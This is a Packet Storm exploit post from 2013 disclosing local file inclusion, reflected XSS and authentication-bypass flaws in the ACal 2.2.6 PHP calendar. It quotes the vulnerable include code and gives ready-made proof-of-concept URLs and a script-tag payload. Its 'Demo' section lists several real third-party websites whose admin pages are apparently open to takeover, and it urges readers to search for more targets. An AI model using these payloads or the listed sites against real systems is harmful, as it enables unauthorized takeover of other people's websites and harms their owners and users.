what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ACal 2.2.6 LFI / XSS / Authentication Bypass

ACal 2.2.6 LFI / XSS / Authentication Bypass
Posted Dec 30, 2013
Authored by TUNISIAN CYBER

ACal version 2.2.6 suffers from authentication bypass, cross site scripting, and local file inclusion vulnerabilities.

tags | exploit, local, vulnerability, xss, file inclusion
SHA-256 | 511a1d027ab58b124b1f26063b3c337a2208eff63967679b47f5076351eb9b0c

ACal 2.2.6 LFI / XSS / Authentication Bypass

Change Mirror Download
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Acal LFI/XSS/Auth Bypass Vulnerabilities
[+] Category: WebApp
[+] Google Dork: Use your mind
[+] Tested on: KaliLinux
[+] Vendor: http://acalproj.sourceforge.net/


########################################################################################

+Description:
A web based event calendar that does not require a database server.
It is made to be easy to install and to be able to run on just about any typical ISP's server with PHP installed.
+Exploit:

Acal Suffers from an LFI,XSS and Auth Bypass vulnerabilities:

1/LFI:

File(s): example.php : Lines 24--30
Parameter:view

[PHP]
// DO NOT EDIT
if (!isset($_GET['view'])) {
include $path . 'embed/' . $view . '.php';
}
else {
include $path . 'embed/' . $_GET['view'] . '.php';
}
[PHP]

P.O.C:
127.0.0.1/calendar/embed/example/example.php?view=[LFI]

2/ XSS:
127.0.0.1/calendar/calendar.php?year=<script>alert(111)</script>
http://s13.postimg.org/u9bvlrg1i/www.jpg

3/Auth Bypass:
You can access directly to the admin panel and you can change login details:
127.0.0.1/calendar/admin/changelogin.php

Demo:
http://www.benifeade.com/i/calendar/admin/changelogin.php
http://www.diprove.unimi.it/calendar/admin/edit.php
http://tavernadeglieroi.altervista.org/calendar/admin/edit.php
http://www.davidcarrjr.com/CAL/calendar/admin/changelogin.php

./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close